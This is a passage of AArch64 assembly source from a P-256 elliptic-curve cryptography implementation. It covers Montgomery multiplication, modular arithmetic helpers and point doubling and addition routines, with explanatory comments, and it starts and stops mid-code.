adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
ldr x3,[x2,#8*(2+1)] // b[2+1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
// last reduction
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
adcs x16,x17,x10 // +=acc[0]*0xffff0001
adcs x17,x19,x11
adc x19,x20,xzr
adds x8,x14,#1 // subs x8,x14,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x19,xzr // did it borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_mul_mont,.-__ecp_nistz256_mul_mont
// note that __ecp_nistz256_sqr_mont expects a[0-3] input pre-loaded
// to x4-x7
.type __ecp_nistz256_sqr_mont,%function
.align 4
__ecp_nistz256_sqr_mont:
// | | | | | |a1*a0| |
// | | | | |a2*a0| | |
// | |a3*a2|a3*a0| | | |
// | | | |a2*a1| | | |
// | | |a3*a1| | | | |
// *| | | | | | | | 2|
// +|a3*a3|a2*a2|a1*a1|a0*a0|
// |--+--+--+--+--+--+--+--|
	// |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax denotes the 64-bit accumulator limb acc[x].
//
// "can't overflow" below mark carrying into high part of
// multiplication result, which can't overflow, because it
// can never be all ones.
mul x15,x5,x4 // a[1]*a[0]
umulh x9,x5,x4
mul x16,x6,x4 // a[2]*a[0]
umulh x10,x6,x4
mul x17,x7,x4 // a[3]*a[0]
umulh x19,x7,x4
adds x16,x16,x9 // accumulate high parts of multiplication
mul x8,x6,x5 // a[2]*a[1]
umulh x9,x6,x5
adcs x17,x17,x10
mul x10,x7,x5 // a[3]*a[1]
umulh x11,x7,x5
adc x19,x19,xzr // can't overflow
mul x20,x7,x6 // a[3]*a[2]
umulh x1,x7,x6
adds x9,x9,x10 // accumulate high parts of multiplication
mul x14,x4,x4 // a[0]*a[0]
adc x10,x11,xzr // can't overflow
adds x17,x17,x8 // accumulate low parts of multiplication
umulh x4,x4,x4
adcs x19,x19,x9
mul x9,x5,x5 // a[1]*a[1]
adcs x20,x20,x10
umulh x5,x5,x5
adc x1,x1,xzr // can't overflow
adds x15,x15,x15 // acc[1-6]*=2
mul x10,x6,x6 // a[2]*a[2]
adcs x16,x16,x16
umulh x6,x6,x6
adcs x17,x17,x17
mul x11,x7,x7 // a[3]*a[3]
adcs x19,x19,x19
umulh x7,x7,x7
adcs x20,x20,x20
adcs x1,x1,x1
adc x2,xzr,xzr
adds x15,x15,x4 // +a[i]*a[i]
adcs x16,x16,x9
adcs x17,x17,x5
adcs x19,x19,x10
adcs x20,x20,x6
lsl x8,x14,#32
adcs x1,x1,x11
lsr x9,x14,#32
adc x2,x2,x7
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
adcs x16,x17,x10 // +=acc[0]*0xffff0001
adc x17,x11,xzr // can't overflow
adds x14,x14,x19 // accumulate upper half
adcs x15,x15,x20
adcs x16,x16,x1
adcs x17,x17,x2
adc x19,xzr,xzr
adds x8,x14,#1 // subs x8,x14,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x19,xzr // did it borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sqr_mont,.-__ecp_nistz256_sqr_mont
// Note that __ecp_nistz256_add_to expects both input vectors pre-loaded to
// x4-x7 and x8-x11. This is done because it's used in multiple
// contexts, e.g. in multiplication by 2 and 3...
.type __ecp_nistz256_add_to,%function
.align 4
__ecp_nistz256_add_to:
adds x14,x14,x8 // ret = a+b
adcs x15,x15,x9
adcs x16,x16,x10
adcs x17,x17,x11
adc x1,xzr,xzr // zap x1
	adds	x8,x14,#1		// subs	x8,x14,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x1,xzr // did subtraction borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_add_to,.-__ecp_nistz256_add_to
.type __ecp_nistz256_sub_from,%function
.align 4
__ecp_nistz256_sub_from:
ldp x8,x9,[x2]
ldp x10,x11,[x2,#16]
subs x14,x14,x8 // ret = a-b
sbcs x15,x15,x9
sbcs x16,x16,x10
sbcs x17,x17,x11
sbc x1,xzr,xzr // zap x1
	subs	x8,x14,#1		// adds	x8,x14,#-1 // tmp = ret+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adc x11,x17,x13
cmp x1,xzr // did subtraction borrow?
csel x14,x14,x8,eq // ret = borrow ? ret+modulus : ret
csel x15,x15,x9,eq
csel x16,x16,x10,eq
stp x14,x15,[x0]
csel x17,x17,x11,eq
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sub_from,.-__ecp_nistz256_sub_from
.type __ecp_nistz256_sub_morf,%function
.align 4
__ecp_nistz256_sub_morf:
ldp x8,x9,[x2]
ldp x10,x11,[x2,#16]
subs x14,x8,x14 // ret = b-a
sbcs x15,x9,x15
sbcs x16,x10,x16
sbcs x17,x11,x17
sbc x1,xzr,xzr // zap x1
	subs	x8,x14,#1		// adds	x8,x14,#-1 // tmp = ret+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adc x11,x17,x13
cmp x1,xzr // did subtraction borrow?
csel x14,x14,x8,eq // ret = borrow ? ret+modulus : ret
csel x15,x15,x9,eq
csel x16,x16,x10,eq
stp x14,x15,[x0]
csel x17,x17,x11,eq
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sub_morf,.-__ecp_nistz256_sub_morf
.type __ecp_nistz256_div_by_2,%function
.align 4
__ecp_nistz256_div_by_2:
	subs	x8,x14,#1		// adds	x8,x14,#-1 // tmp = a+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adcs x11,x17,x13
adc x1,xzr,xzr // zap x1
tst x14,#1 // is a even?
csel x14,x14,x8,eq // ret = even ? a : a+modulus
csel x15,x15,x9,eq
csel x16,x16,x10,eq
csel x17,x17,x11,eq
csel x1,xzr,x1,eq
lsr x14,x14,#1 // ret >>= 1
orr x14,x14,x15,lsl#63
lsr x15,x15,#1
orr x15,x15,x16,lsl#63
lsr x16,x16,#1
orr x16,x16,x17,lsl#63
lsr x17,x17,#1
stp x14,x15,[x0]
orr x17,x17,x1,lsl#63
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_div_by_2,.-__ecp_nistz256_div_by_2
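// The halving above follows the usual modular rule (a hedged Python
// sketch): if a is odd, add the modulus first so the shift is exact;
// the result is a * 2^{-1} mod p. The asm keeps the 257th bit in x1.
//   def div_by_2_mod_p(a, p):
//       if a & 1:
//           a += p
//       return a >> 1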
.globl ecp_nistz256_point_double
.hidden ecp_nistz256_point_double
.type ecp_nistz256_point_double,%function
.align 5
ecp_nistz256_point_double:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-96]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
sub sp,sp,#32*4
.Ldouble_shortcut:
ldp x14,x15,[x1,#32]
mov x21,x0
ldp x16,x17,[x1,#48]
mov x22,x1
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
mov x8,x14
ldr x13,[x13,#24]
mov x9,x15
ldp x4,x5,[x22,#64] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[x22,#64+16]
add x0,sp,#0
bl __ecp_nistz256_add_to // p256_mul_by_2(S, in_y);
add x0,sp,#64
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Zsqr, in_z);
ldp x8,x9,[x22]
ldp x10,x11,[x22,#16]
mov x4,x14 // put Zsqr aside for p256_sub
mov x5,x15
mov x6,x16
mov x7,x17
add x0,sp,#32
bl __ecp_nistz256_add_to // p256_add(M, Zsqr, in_x);
add x2,x22,#0
mov x14,x4 // restore Zsqr
mov x15,x5
ldp x4,x5,[sp,#0] // forward load for p256_sqr_mont
mov x16,x6
mov x17,x7
ldp x6,x7,[sp,#0+16]
add x0,sp,#64
bl __ecp_nistz256_sub_morf // p256_sub(Zsqr, in_x, Zsqr);
add x0,sp,#0
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(S, S);
ldr x3,[x22,#32]
ldp x4,x5,[x22,#64]
ldp x6,x7,[x22,#64+16]
add x2,x22,#32
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(tmp0, in_z, in_y);
mov x8,x14
mov x9,x15
ldp x4,x5,[sp,#0] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[sp,#0+16]
add x0,x21,#64
bl __ecp_nistz256_add_to // p256_mul_by_2(res_z, tmp0);
add x0,sp,#96
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(tmp0, S);
ldr x3,[sp,#64] // forward load for p256_mul_mont
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x0,x21,#32
bl __ecp_nistz256_div_by_2 // p256_div_by_2(res_y, tmp0);
add x2,sp,#64
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(M, M, Zsqr);
mov x8,x14 // duplicate M
mov x9,x15
mov x10,x16
mov x11,x17
mov x4,x14 // put M aside
mov x5,x15
mov x6,x16
mov x7,x17
add x0,sp,#32
bl __ecp_nistz256_add_to
mov x8,x4 // restore M
mov x9,x5
ldr x3,[x22] // forward load for p256_mul_mont
mov x10,x6
ldp x4,x5,[sp,#0]
mov x11,x7
ldp x6,x7,[sp,#0+16]
bl __ecp_nistz256_add_to // p256_mul_by_3(M, M);
add x2,x22,#0
add x0,sp,#0
bl __ecp_nistz256_mul_mont // p256_mul_mont(S, S, in_x);
mov x8,x14
mov x9,x15
ldp x4,x5,[sp,#32] // forward load for p256_sqr_mont
mov x10,x16
mov x11,x17
ldp x6,x7,[sp,#32+16]
add x0,sp,#96
bl __ecp_nistz256_add_to // p256_mul_by_2(tmp0, S);
add x0,x21,#0
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(res_x, M);
add x2,sp,#96
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, tmp0);
add x2,sp,#0
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(S, S, res_x);
ldr x3,[sp,#32]
mov x4,x14 // copy S
mov x5,x15
mov x6,x16
mov x7,x17
add x2,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(S, S, M);
add x2,x21,#32
add x0,x21,#32
bl __ecp_nistz256_sub_from // p256_sub(res_y, S, res_y);
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x29,x30,[sp],#96
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_double,.-ecp_nistz256_point_double
.globl ecp_nistz256_point_add
.hidden ecp_nistz256_point_add
.type ecp_nistz256_point_add,%function
.align 5
ecp_nistz256_point_add:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-96]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub sp,sp,#32*12
ldp x4,x5,[x2,#64] // in2_z
ldp x6,x7,[x2,#64+16]
mov x21,x0
mov x22,x1
mov x23,x2
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
orr x8,x4,x5
orr x10,x6,x7
orr x25,x8,x10
cmp x25,#0
csetm x25,ne // ~in2infty
add x0,sp,#192
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z2sqr, in2_z);
ldp x4,x5,[x22,#64] // in1_z
ldp x6,x7,[x22,#64+16]
orr x8,x4,x5
orr x10,x6,x7
orr x24,x8,x10
cmp x24,#0
csetm x24,ne // ~in1infty
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z1sqr, in1_z);
ldr x3,[x23,#64]
ldp x4,x5,[sp,#192]
ldp x6,x7,[sp,#192+16]
add x2,x23,#64
add x0,sp,#320
bl __ecp_nistz256_mul_mont // p256_mul_mont(S1, Z2sqr, in2_z);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,x22,#64
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, Z1sqr, in1_z);
ldr x3,[x22,#32]
ldp x4,x5,[sp,#320]
ldp x6,x7,[sp,#320+16]
add x2,x22,#32
add x0,sp,#320
bl __ecp_nistz256_mul_mont // p256_mul_mont(S1, S1, in1_y);
ldr x3,[x23,#32]
ldp x4,x5,[sp,#352]
ldp x6,x7,[sp,#352+16]
add x2,x23,#32
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S2, in2_y);
add x2,sp,#320
ldr x3,[sp,#192] // forward load for p256_mul_mont
ldp x4,x5,[x22]
ldp x6,x7,[x22,#16]
add x0,sp,#160
bl __ecp_nistz256_sub_from // p256_sub(R, S2, S1);
orr x14,x14,x15 // see if result is zero
orr x16,x16,x17
orr x26,x14,x16 // ~is_equal(S1,S2)
add x2,sp,#192
add x0,sp,#256
bl __ecp_nistz256_mul_mont // p256_mul_mont(U1, in1_x, Z2sqr);
ldr x3,[sp,#128]
ldp x4,x5,[x23]
ldp x6,x7,[x23,#16]
add x2,sp,#128
add x0,sp,#288
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, in2_x, Z1sqr);
add x2,sp,#256
ldp x4,x5,[sp,#160] // forward load for p256_sqr_mont
ldp x6,x7,[sp,#160+16]
add x0,sp,#96
bl __ecp_nistz256_sub_from // p256_sub(H, U2, U1);
orr x14,x14,x15 // see if result is zero
orr x16,x16,x17
orr x14,x14,x16 // ~is_equal(U1,U2)
mvn x27,x24 // -1/0 -> 0/-1
mvn x28,x25 // -1/0 -> 0/-1
orr x14,x14,x27
orr x14,x14,x28
orr x14,x14,x26
cbnz x14,.Ladd_proceed // if(~is_equal(U1,U2) | in1infty | in2infty | ~is_equal(S1,S2))
.Ladd_double:
mov x1,x22
mov x0,x21
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
	add	sp,sp,#256	// #256 is from #32*(12-4), the difference in stack frames
b .Ldouble_shortcut
.align 4
.Ladd_proceed:
add x0,sp,#192
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Rsqr, R);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#96]
ldp x6,x7,[sp,#96+16]
add x2,x22,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, H, in1_z);
ldp x4,x5,[sp,#96]
ldp x6,x7,[sp,#96+16]
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Hsqr, H);
ldr x3,[x23,#64]
ldp x4,x5,[sp,#64]
ldp x6,x7,[sp,#64+16]
add x2,x23,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, res_z, in2_z);
ldr x3,[sp,#96]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,sp,#96
add x0,sp,#224
bl __ecp_nistz256_mul_mont // p256_mul_mont(Hcub, Hsqr, H);
ldr x3,[sp,#128]
ldp x4,x5,[sp,#256]
ldp x6,x7,[sp,#256+16]
add x2,sp,#128
add x0,sp,#288
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, U1, Hsqr);
mov x8,x14
mov x9,x15
mov x10,x16
mov x11,x17
add x0,sp,#128
bl __ecp_nistz256_add_to // p256_mul_by_2(Hsqr, U2);
add x2,sp,#192
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(res_x, Rsqr, Hsqr);
add x2,sp,#224
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, Hcub);
add x2,sp,#288
ldr x3,[sp,#224] // forward load for p256_mul_mont
ldp x4,x5,[sp,#320]
ldp x6,x7,[sp,#320+16]
add x0,sp,#32
bl __ecp_nistz256_sub_morf // p256_sub(res_y, U2, res_x);
add x2,sp,#224
add x0,sp,#352
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S1, Hcub);
ldr x3,[sp,#160]
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x2,sp,#160
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_y, res_y, R);
add x2,sp,#352
bl __ecp_nistz256_sub_from // p256_sub(res_y, res_y, S2);
ldp x4,x5,[sp,#0] // res
ldp x6,x7,[sp,#0+16]
ldp x8,x9,[x23] // in2
ldp x10,x11,[x23,#16]
ldp x14,x15,[x22,#0] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#0+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+0+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+0+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#0+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#0+48]
stp x14,x15,[x21,#0]
stp x16,x17,[x21,#0+16]
ldp x14,x15,[x22,#32] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#32+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+32+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+32+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#32+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#32+48]
stp x14,x15,[x21,#32]
stp x16,x17,[x21,#32+16]
ldp x14,x15,[x22,#64] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#64+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
csel x14,x8,x14,ne
csel x15,x9,x15,ne
csel x16,x10,x16,ne
csel x17,x11,x17,ne
stp x14,x15,[x21,#64]
stp x16,x17,[x21,#64+16]
.Ladd_done:
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#96
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_add,.-ecp_nistz256_point_add
.globl ecp_nistz256_point_add_affine
.hidden ecp_nistz256_point_add_affine
.type ecp_nistz256_point_add_affine,%function
.align 5
ecp_nistz256_point_add_affine:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-80]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
sub sp,sp,#32*10
mov x21,x0
mov x22,x1
mov x23,x2
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
ldp x4,x5,[x1,#64] // in1_z
ldp x6,x7,[x1,#64+16]
orr x8,x4,x5
orr x10,x6,x7
orr x24,x8,x10
cmp x24,#0
csetm x24,ne // ~in1infty
ldp x14,x15,[x2] // in2_x
ldp x16,x17,[x2,#16]
ldp x8,x9,[x2,#32] // in2_y
ldp x10,x11,[x2,#48]
orr x14,x14,x15
orr x16,x16,x17
orr x8,x8,x9
orr x10,x10,x11
orr x14,x14,x16
orr x8,x8,x10
orr x25,x14,x8
cmp x25,#0
csetm x25,ne // ~in2infty
add x0,sp,#128
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Z1sqr, in1_z);
mov x4,x14
mov x5,x15
mov x6,x16
mov x7,x17
ldr x3,[x23]
add x2,x23,#0
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, Z1sqr, in2_x);
add x2,x22,#0
ldr x3,[x22,#64] // forward load for p256_mul_mont
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x0,sp,#160
bl __ecp_nistz256_sub_from // p256_sub(H, U2, in1_x);
add x2,x22,#64
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, Z1sqr, in1_z);
ldr x3,[x22,#64]
ldp x4,x5,[sp,#160]
ldp x6,x7,[sp,#160+16]
add x2,x22,#64
add x0,sp,#64
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_z, H, in1_z);
ldr x3,[x23,#32]
ldp x4,x5,[sp,#128]
ldp x6,x7,[sp,#128+16]
add x2,x23,#32
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, S2, in2_y);
add x2,x22,#32
ldp x4,x5,[sp,#160] // forward load for p256_sqr_mont
ldp x6,x7,[sp,#160+16]
add x0,sp,#192
bl __ecp_nistz256_sub_from // p256_sub(R, S2, in1_y);
add x0,sp,#224
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Hsqr, H);
ldp x4,x5,[sp,#192]
ldp x6,x7,[sp,#192+16]
add x0,sp,#288
bl __ecp_nistz256_sqr_mont // p256_sqr_mont(Rsqr, R);
ldr x3,[sp,#160]
ldp x4,x5,[sp,#224]
ldp x6,x7,[sp,#224+16]
add x2,sp,#160
add x0,sp,#256
bl __ecp_nistz256_mul_mont // p256_mul_mont(Hcub, Hsqr, H);
ldr x3,[x22]
ldp x4,x5,[sp,#224]
ldp x6,x7,[sp,#224+16]
add x2,x22,#0
add x0,sp,#96
bl __ecp_nistz256_mul_mont // p256_mul_mont(U2, in1_x, Hsqr);
mov x8,x14
mov x9,x15
mov x10,x16
mov x11,x17
add x0,sp,#224
bl __ecp_nistz256_add_to // p256_mul_by_2(Hsqr, U2);
add x2,sp,#288
add x0,sp,#0
bl __ecp_nistz256_sub_morf // p256_sub(res_x, Rsqr, Hsqr);
add x2,sp,#256
bl __ecp_nistz256_sub_from // p256_sub(res_x, res_x, Hcub);
add x2,sp,#96
ldr x3,[x22,#32] // forward load for p256_mul_mont
ldp x4,x5,[sp,#256]
ldp x6,x7,[sp,#256+16]
add x0,sp,#32
bl __ecp_nistz256_sub_morf // p256_sub(res_y, U2, res_x);
add x2,x22,#32
add x0,sp,#128
bl __ecp_nistz256_mul_mont // p256_mul_mont(S2, in1_y, Hcub);
ldr x3,[sp,#192]
ldp x4,x5,[sp,#32]
ldp x6,x7,[sp,#32+16]
add x2,sp,#192
add x0,sp,#32
bl __ecp_nistz256_mul_mont // p256_mul_mont(res_y, res_y, R);
add x2,sp,#128
bl __ecp_nistz256_sub_from // p256_sub(res_y, res_y, S2);
ldp x4,x5,[sp,#0] // res
ldp x6,x7,[sp,#0+16]
ldp x8,x9,[x23] // in2
ldp x10,x11,[x23,#16]
ldp x14,x15,[x22,#0] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#0+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+0+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+0+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#0+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#0+48]
stp x14,x15,[x21,#0]
stp x16,x17,[x21,#0+16]
adrp x23,.Lone_mont-64
add x23,x23,:lo12:.Lone_mont-64
ldp x14,x15,[x22,#32] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#32+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
ldp x4,x5,[sp,#0+32+32] // res
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
ldp x6,x7,[sp,#0+32+48]
csel x14,x8,x14,ne
csel x15,x9,x15,ne
ldp x8,x9,[x23,#32+32] // in2
csel x16,x10,x16,ne
csel x17,x11,x17,ne
ldp x10,x11,[x23,#32+48]
stp x14,x15,[x21,#32]
stp x16,x17,[x21,#32+16]
ldp x14,x15,[x22,#64] // in1
cmp x24,#0 // ~, remember?
ldp x16,x17,[x22,#64+16]
csel x8,x4,x8,ne
csel x9,x5,x9,ne
csel x10,x6,x10,ne
csel x11,x7,x11,ne
cmp x25,#0 // ~, remember?
csel x14,x8,x14,ne
csel x15,x9,x15,ne
csel x16,x10,x16,ne
csel x17,x11,x17,ne
stp x14,x15,[x21,#64]
stp x16,x17,[x21,#64+16]
add sp,x29,#0 // destroy frame
ldp x19,x20,[x29,#16]
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x29,x30,[sp],#80
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_point_add_affine,.-ecp_nistz256_point_add_affine
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_ord_mul_mont(uint64_t res[4], uint64_t a[4],
// uint64_t b[4]);
.globl ecp_nistz256_ord_mul_mont
.hidden ecp_nistz256_ord_mul_mont
.type ecp_nistz256_ord_mul_mont,%function
.align 4
ecp_nistz256_ord_mul_mont:
AARCH64_VALID_CALL_TARGET
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
adrp x23,.Lord
add x23,x23,:lo12:.Lord
ldr x3,[x2] // bp[0]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
ldp x12,x13,[x23,#0]
ldp x21,x22,[x23,#16]
ldr x23,[x23,#32]
mul x14,x4,x3 // a[0]*b[0]
umulh x8,x4,x3
mul x15,x5,x3 // a[1]*b[0]
umulh x9,x5,x3
mul x16,x6,x3 // a[2]*b[0]
umulh x10,x6,x3
mul x17,x7,x3 // a[3]*b[0]
umulh x19,x7,x3
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts of multiplication
adcs x16,x16,x9
adcs x17,x17,x10
adc x19,x19,xzr
mov x20,xzr
ldr x3,[x2,#8*1] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
